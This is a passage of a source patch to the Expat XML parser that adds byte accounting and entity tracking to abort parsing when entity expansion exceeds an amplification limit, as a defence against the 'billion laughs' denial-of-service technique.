++ BINDING **bindingsPtr,
++ enum XML_Account account);
+ static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
+ const ATTRIBUTE_ID *attId, const XML_Char *uri,
+ BINDING **bindingsPtr);
+@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
+ XML_Parser parser);
+ static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
+ static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *start, const char *end);
++ const char *start, const char *end,
++ enum XML_Account account);
+ static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int reportComment(XML_Parser parser, const ENCODING *enc,
+@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
+
+ static void parserInit(XML_Parser parser, const XML_Char *encodingName);
+
++#ifdef XML_DTD
++static float accountingGetCurrentAmplification(XML_Parser rootParser);
++static void accountingReportStats(XML_Parser originParser, const char *epilog);
++static void accountingOnAbort(XML_Parser originParser);
++static void accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser,
++ const char *before, const char *after,
++ ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account);
++static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
++ const char *before, const char *after,
++ int source_line,
++ enum XML_Account account);
++
++static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
++ const char *action, int sourceLine);
++static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++
++static XML_Parser getRootParserOf(XML_Parser parser,
++ unsigned int *outLevelDiff);
++static const char *unsignedCharToPrintable(unsigned char c);
++#endif /* XML_DTD */
++
++static unsigned long getDebugLevel(const char *variableName,
++ unsigned long defaultDebugLevel);
++
+ #define poolStart(pool) ((pool)->start)
+ #define poolEnd(pool) ((pool)->ptr)
+ #define poolLength(pool) ((pool)->ptr - (pool)->start)
+@@ -616,6 +678,10 @@ struct XML_ParserStruct {
+ enum XML_ParamEntityParsing m_paramEntityParsing;
+ #endif
+ unsigned long m_hash_secret_salt;
++#ifdef XML_DTD
++ ACCOUNTING m_accounting;
++ ENTITY_STATS m_entity_stats;
++#endif
+ };
+
+ #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
+@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
+ parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
+ #endif
+ parser->m_hash_secret_salt = 0;
++
++#ifdef XML_DTD
++ memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
++ parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
++ parser->m_accounting.maximumAmplificationFactor
++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
++ parser->m_accounting.activationThresholdBytes
++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
++
++ memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
++ parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
++#endif
+ }
+
+ /* moves list of bindings to m_freeBindingList */
+@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
+ /* Added in 2.2.5. */
+ case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
+ return XML_L("invalid argument");
++ /* Added in 2.4.0. */
++ case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
++ return XML_L(
++ "limit on input amplification factor (from DTD and entities) breached");
+ }
+ return NULL;
+ }
+@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
+
+ const XML_Feature *XMLCALL
+ XML_GetFeatureList(void) {
+- static const XML_Feature features[]
+- = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
+- sizeof(XML_Char)},
+- {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
+- sizeof(XML_LChar)},
++ static const XML_Feature features[] = {
++ {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
++ sizeof(XML_Char)},
++ {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
++ sizeof(XML_LChar)},
+ #ifdef XML_UNICODE
+- {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
++ {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
+ #endif
+ #ifdef XML_UNICODE_WCHAR_T
+- {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
++ {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
+ #endif
+ #ifdef XML_DTD
+- {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
++ {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
+ #endif
+ #ifdef XML_CONTEXT_BYTES
+- {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
+- XML_CONTEXT_BYTES},
++ {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
++ XML_CONTEXT_BYTES},
+ #endif
+ #ifdef XML_MIN_SIZE
+- {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
++ {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
+ #endif
+ #ifdef XML_NS
+- {XML_FEATURE_NS, XML_L("XML_NS"), 0},
++ {XML_FEATURE_NS, XML_L("XML_NS"), 0},
+ #endif
+ #ifdef XML_LARGE_SIZE
+- {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
++ {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
+ #endif
+ #ifdef XML_ATTR_INFO
+- {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
++ {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
+ #endif
+- {XML_FEATURE_END, NULL, 0}};
++#ifdef XML_DTD
++ /* Added in Expat 2.4.0. */
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_L("XML_BLAP_MAX_AMP"),
++ (long int)
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
++ XML_L("XML_BLAP_ACT_THRES"),
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
++#endif
++ {XML_FEATURE_END, NULL, 0}};
+
+ return features;
+ }
+
++#ifdef XML_DTD
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)
++ || isnan(maximumAmplificationFactor)
++ || (maximumAmplificationFactor < 1.0f)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
++ return XML_TRUE;
++}
++
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
++ return XML_TRUE;
++}
++#endif /* XML_DTD */
++
+ /* Initially tag->rawName always points into the parse buffer;
+ for those TAG instances opened while the current parse buffer was
+ processed, and not yet closed, we need to store tag->rawName in a more
+@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
+ static enum XML_Error PTRCALL
+ contentProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doContent(
++ parser, 0, parser->m_encoding, start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
+ int tok = XmlContentTok(parser->m_encoding, start, end, &next);
+ switch (tok) {
+ case XML_TOK_BOM:
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif /* XML_DTD */
++
+ /* If we are at the end of the buffer, this would cause the next stage,
+ i.e. externalEntityInitProcessor3, to pass control directly to
+ doContent (by detecting XML_TOK_NONE) without processing any xml text
+@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
+ const char *next = start; /* XmlContentTok doesn't always set the last arg */
+ parser->m_eventPtr = start;
+ tok = XmlContentTok(parser->m_encoding, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - processXmlDecl
++ - externalEntityContentProcessor
++ */
+ parser->m_eventEndPtr = next;
+
+ switch (tok) {
+@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr) {
+ enum XML_Error result
+ = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ static enum XML_Error
+ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ const char *s, const char *end, const char **nextPtr,
+- XML_Bool haveMore) {
++ XML_Bool haveMore, enum XML_Account account) {
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ for (;;) {
+ const char *next = s; /* XmlContentTok doesn't always set the last arg */
+ int tok = XmlContentTok(enc, s, end, &next);
++#ifdef XML_DTD
++ const char *accountAfter
++ = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
++ ? (haveMore ? s /* i.e. 0 bytes */ : end)
++ : next;
++ if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_TRAILING_CR:
+@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (parser->m_characterDataHandler)
+ parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
+ else if (parser->m_defaultHandler)
+@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ }
+ tag->name.str = (XML_Char *)tag->buf;
+ *toPtr = XML_T('\0');
+- result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
++ result
++ = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
+ if (result)
+ return result;
+ if (parser->m_startElementHandler)
+@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ if (! name.str)
+ return XML_ERROR_NO_MEMORY;
+ poolFinish(&parser->m_tempPool);
+- result = storeAtts(parser, enc, s, &name, &bindings);
++ result = storeAtts(parser, enc, s, &name, &bindings,
++ XML_ACCOUNT_NONE /* token spans whole start tag */);
+ if (result != XML_ERROR_NONE) {
+ freeBindings(parser, bindings);
+ return result;
+@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ /* END disabled code */
+ else if (parser->m_defaultHandler)
+ reportDefault(parser, enc, s, next);
+- result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
++ result
++ = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
+ if (result != XML_ERROR_NONE)
+ return result;
+ else if (! next) {
+@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
+ */
+ static enum XML_Error
+ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+- TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
++ TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ ELEMENT_TYPE *elementType;
+ int nDefaultAtts;
+@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ /* normalize the attribute value */
+ result = storeAttributeValue(
+ parser, enc, isCdata, parser->m_atts[i].valuePtr,
+- parser->m_atts[i].valueEnd, &parser->m_tempPool);
++ parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
+ if (result)
+ return result;
+ appAtts[attIndex] = poolStart(&parser->m_tempPool);
+@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ static enum XML_Error PTRCALL
+ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doCdataSection(
++ parser, parser->m_encoding, &start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result != XML_ERROR_NONE)
+ return result;
+ if (start) {
+@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ */
+ static enum XML_Error
+ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+- const char *end, const char **nextPtr, XML_Bool haveMore) {
++ const char *end, const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account) {
+ const char *s = *startPtr;
+ const char **eventPP;
+ const char **eventEndPP;
+@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ for (;;) {
+ const char *next;
+ int tok = XmlCdataSectionTok(enc, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#else
++ UNUSED_P(account);
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_CDATA_SECT_CLOSE:
+@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ *eventPP = s;
+ *startPtr = NULL;
+ tok = XmlIgnoreSectionTok(enc, s, end, &next);
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_IGNORE_SECT:
+@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
+ const char *versionend;
+ const XML_Char *storedversion = NULL;
+ int standalone = -1;
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
++
+ if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
+ isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
+ &version, &versionend, &encodingName, &newEncoding, &standalone)) {
+@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(parser->m_encoding, start, end, &next);
++ /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
++ - storeEntityValue
++ - processXmlDecl
++ */
+ parser->m_eventEndPtr = next;
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, parser->m_encoding, s, end);
++ return storeEntityValue(parser, parser->m_encoding, s, end,
++ XML_ACCOUNT_DIRECT);
+ } else if (tok == XML_TOK_XML_DECL) {
+ enum XML_Error result;
+ result = processXmlDecl(parser, 0, start, next);
+@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ */
+ else if (tok == XML_TOK_BOM && next == end
+ && ! parser->m_parsingStatus.finalBuffer) {
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
++
+ *nextPtr = next;
+ return XML_ERROR_NONE;
+ }
+@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
+ }
+ /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
+ However, when parsing an external subset, doProlog will not accept a BOM
+- as valid, and report a syntax error, so we have to skip the BOM
++ as valid, and report a syntax error, so we have to skip the BOM, and
++ account for the BOM bytes.
+ */
+ else if (tok == XML_TOK_BOM) {
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++
+ s = next;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ }
+
+ parser->m_processor = prologProcessor;
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error PTRCALL
+@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(enc, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - storeEntityValue
++ */
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+ *nextPtr = s;
+@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, enc, s, end);
++ return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
+ }
+ start = next;
+ }
+@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
+ const char *next = s;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error
+ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
+- XML_Bool allowClosingDoctype) {
++ XML_Bool allowClosingDoctype, enum XML_Account account) {
+ #ifdef XML_DTD
+ static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
+ #endif /* XML_DTD */
+@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
+ static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
+
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+ }
+ role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
++#ifdef XML_DTD
++ switch (role) {
++ case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
++ case XML_ROLE_XML_DECL: // bytes accounted in processXmlDecl
++ case XML_ROLE_TEXT_DECL: // bytes accounted in processXmlDecl
++ break;
++ default:
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++ }
++#endif
+ switch (role) {
+ case XML_ROLE_XML_DECL: {
+ enum XML_Error result = processXmlDecl(parser, 0, s, next);
+@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ const XML_Char *attVal;
+ enum XML_Error result = storeAttributeValue(
+ parser, enc, parser->m_declAttributeIsCdata,
+- s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
++ s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
++ XML_ACCOUNT_NONE);
+ if (result)
+ return result;
+ attVal = poolStart(&dtd->pool);
+@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ break;
+ case XML_ROLE_ENTITY_VALUE:
+ if (dtd->keepProcessing) {
+- enum XML_Error result = storeEntityValue(
+- parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
++ enum XML_Error result
++ = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
++ next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
+ if (parser->m_declEntity) {
+ parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
+ parser->m_declEntity->textLen
+@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ }
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ handleDefault = XML_FALSE;
+ if (! dtd->paramEntityRead) {
+@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
+ for (;;) {
+ const char *next = NULL;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ parser->m_eventEndPtr = next;
+ switch (tok) {
+ /* report partial linebreak - it might be the last token */
+@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ entity->processed = 0;
+ openEntity->next = parser->m_openInternalEntities;
+ parser->m_openInternalEntities = openEntity;
+@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_FALSE);
++ tok, next, &next, XML_FALSE, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
+- textStart, textEnd, &next, XML_FALSE);
++ textStart, textEnd, &next, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result == XML_ERROR_NONE) {
+ if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
+ entity->processed = (int)(next - textStart);
+ parser->m_processor = internalEntityProcessor;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif /* XML_DTD */
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_TRUE);
++ tok, next, &next, XML_FALSE, XML_TRUE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, openEntity->startTagLevel,
+ parser->m_internalEncoding, textStart, textEnd, &next,
+- XML_FALSE);
++ XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result != XML_ERROR_NONE)
+ return result;
+@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ entity->processed = (int)(next - (char *)entity->textPtr);
+ return result;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ parser->m_processor = prologProcessor;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ } else
+ #endif /* XML_DTD */
+ {
+@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ /* see externalEntityContentProcessor vs contentProcessor */
+ return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+ s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
+ }
+ }
+
+@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
+
+ static enum XML_Error
+ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ enum XML_Error result
+- = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
++ = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
+ if (result)
+ return result;
+ if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
+@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ for (;;) {
+ const char *next;
+ int tok = XmlAttributeValueTok(enc, ptr, end, &next);
++#ifdef XML_DTD
